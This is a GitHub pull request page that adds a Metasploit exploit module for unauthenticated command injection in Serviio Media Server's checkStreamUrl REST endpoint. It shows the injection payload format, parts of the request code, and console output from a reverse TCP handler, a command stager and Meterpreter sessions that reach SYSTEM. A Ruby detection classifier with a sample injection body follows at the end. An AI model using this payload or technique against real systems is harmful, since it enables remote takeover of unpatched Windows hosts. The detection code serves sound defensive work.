
Add Serviio Media Server checkStreamUrl Command Execution #8347

Merged
merged 4 commits into from May 16, 2017

Conversation

@bcoles bcoles (Contributor) commented May 5, 2017

This PR adds an exploit module for Serviio Media Server.

This module exploits an unauthenticated remote command execution vulnerability
in the console component of Serviio Media Server versions 1.4 to 1.8 on
Windows operating systems.

The console service (on port 23423 by default) exposes a REST API which
does not require authentication.

The 'action' API endpoint does not sufficiently sanitize user-supplied data
in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is
used in a call to cmd.exe resulting in execution of arbitrary commands.

This module has been tested successfully on Serviio Media Server versions
1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.

Documentation

To follow; when I feel like it.

Verification

  • Start msfconsole
  • use exploit/windows/http/serviio_checkstreamurl_cmd_exec
  • check
  • Verify the check method returns Unknown if the connection to the target server fails.
  • Verify the check method returns Appears if the target server is Serviio version 1.4 to 1.8 on Windows.
  • Verify the check method returns Safe if the target server is not Serviio version 1.4 to 1.8 on Windows.
  • run
  • Verify you get a shell.

Output

msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
verbose => true
msf exploit(serviio_checkstreamurl_cmd_exec) > check

[*] 172.16.191.166:23423 Serviio Media Server version 1.8
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] Serviio Media Server version 1.8
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 172.16.191.166
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd 
C:\Program Files\Serviio\bin

def execute_command(cmd, opts = {})
json = { 'name' => 'checkStreamUrl',
'parameter' => ['VIDEO', "\" &#{cmd}&"] }.to_json

@mdisec mdisec (Contributor) May 8, 2017

Formatting suggestions.

    json = {
      'name'      => 'checkStreamUrl',
      'parameter' => ['VIDEO', "\" &#{cmd}&"]
    }.to_json

@bcoles bcoles (Contributor, Author) May 8, 2017

No thanks

@bcoles bcoles (Contributor, Author) May 10, 2017

Symmetrical style hash brace layout as per Rubocop MultilineHashBraceLayout in lieu of a Metasploit style guide.

However the .to_json call should probably be moved inside the send_request_uri method. I've fixed this.

'method' => 'POST',
'ctype' => 'application/json',
'data' => json)
end

@mdisec mdisec (Contributor) May 8, 2017

Yet another formatting suggestion.

send_request_cgi(
  'uri'    => normalize_uri(target_uri.path, 'rest', 'action'),
  'method' => 'POST',
  'ctype'  => 'application/json',
  'data'   => json
)

@bcoles bcoles (Contributor, Author) May 8, 2017

No thanks

@bcoles bcoles (Contributor, Author) May 10, 2017

Symmetrical style method call brace layout as per Rubocop MultilineMethodCallBraceLayout in lieu of a Metasploit style guide.

end

def exploit
fail_with(Failure::NoTarget, 'Target is not vulnerable') unless check == CheckCode::Appears

@mdisec mdisec (Contributor) May 8, 2017

I believe you may want to use Failure::NotVulnerable instead of Failure::NoTarget.

@bcoles bcoles (Contributor, Author) May 8, 2017

Fixed

@wchen-r7 wchen-r7 self-assigned this May 16, 2017

@wchen-r7 wchen-r7 (Contributor) commented May 16, 2017

Testing...

@wchen-r7 wchen-r7 (Contributor) commented May 16, 2017

Flawless victory:

msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 192.168.146.171:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 192.168.146.171
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.171:49186) at 2017-05-16 16:17:37 -0500

meterpreter > 

@wchen-r7 wchen-r7 merged commit 42c7d64 into rapid7:master May 16, 2017
1 check passed

@wchen-r7 wchen-r7 (Contributor) commented May 16, 2017

Release Notes

The exploits/windows/http/serviio_checkstreamurl_cmd_exec module has been added to the framework. It exploits a vulnerability in Serviio Media Server. Serviio is a free media server that allows you to stream video, audio, and images. The console service in Serviio exposes a REST API that allows a remote user to execute system commands, which can be abused to gain arbitrary remote code execution under the context of SYSTEM (on Windows).
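The root cause described in this thread is that the VIDEO argument of the checkStreamUrl action reaches cmd.exe unsanitized. As an added example (not part of this PR, the Metasploit module, or Serviio's own code), the Ruby below shows the detection side: a classifier that a reverse proxy or log pipeline in front of the console port could run over POST bodies to /rest/action, flagging checkStreamUrl calls whose VIDEO argument carries cmd.exe metacharacters or does not look like a stream URL. The sample bodies, the metacharacter set and the allowed scheme list are constructed assumptions for this example, not values taken from Serviio.

```ruby
require 'json'

# Constructed sample POST bodies for /rest/action, in the shape a reverse
# proxy or WAF in front of the Serviio console port (23423) might log them.
# They are made up for this example, not captured traffic.
SAMPLE_BODIES = [
  '{"name":"checkStreamUrl","parameter":["VIDEO","http://media.example/clip.mp4"]}',
  '{"name":"checkStreamUrl","parameter":["VIDEO","http://media.example/list?fmt=mp4&q=hd"]}',
  '{"name":"checkStreamUrl","parameter":["VIDEO","\" &whoami&"]}',
  '{"name":"checkStreamUrl","parameter":["VIDEO","rtsp://cam.example/live|dir"]}',
  '{"name":"getStatus","parameter":[]}',
  'not json at all'
].freeze

# Characters with meaning to cmd.exe that never belong in a stream URL.
# '&' is handled separately because it is legitimate inside a query string.
CMD_METACHARS = /["|<>^`]/

# Schemes a stream URL is expected to use (assumed allow-list for the example).
ALLOWED_SCHEMES = %w[http https rtsp rtmp mms].freeze

# Classify one request body. Returns:
#   :ignore     - not JSON, or not a checkStreamUrl call with a VIDEO argument
#   :benign     - checkStreamUrl with a plausible URL argument
#   :suspicious - VIDEO argument carries shell metacharacters or is not a URL
def classify_action_body(body)
  data = JSON.parse(body)
  return :ignore unless data.is_a?(Hash) && data['name'] == 'checkStreamUrl'

  params = data['parameter']
  return :ignore unless params.is_a?(Array) && params.first == 'VIDEO'

  value = params[1].to_s
  # '&' before the '?' cannot be a query separator, so treat it as injection.
  before_query = value.split('?', 2).first.to_s
  return :suspicious if value.match?(CMD_METACHARS) || before_query.include?('&')

  # Require a recognised URL scheme; anything else is not a stream URL.
  scheme = value[/\A([a-z][a-z0-9+.-]*):\/\//i, 1]
  return :suspicious unless scheme && ALLOWED_SCHEMES.include?(scheme.downcase)

  :benign
rescue JSON::ParserError
  :ignore
end

# Run the classifier over a list of bodies and return the suspicious ones.
def find_injection_attempts(bodies)
  bodies.select { |b| classify_action_body(b) == :suspicious }
end

if __FILE__ == $PROGRAM_NAME
  find_injection_attempts(SAMPLE_BODIES).each do |b|
    puts "ALERT checkStreamUrl injection attempt: #{b}"
  end
end
```

The rule is deliberately narrow: it only inspects the one action named in this thread, accepts `&` where a query string makes it legitimate, and treats any remaining cmd.exe metacharacter or non-URL value as an alert. Because the endpoint is unauthenticated, the alert is only useful if the console port is not reachable from untrusted networks in the first place; restricting access to port 23423 is the mitigation, the rule is for visibility.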
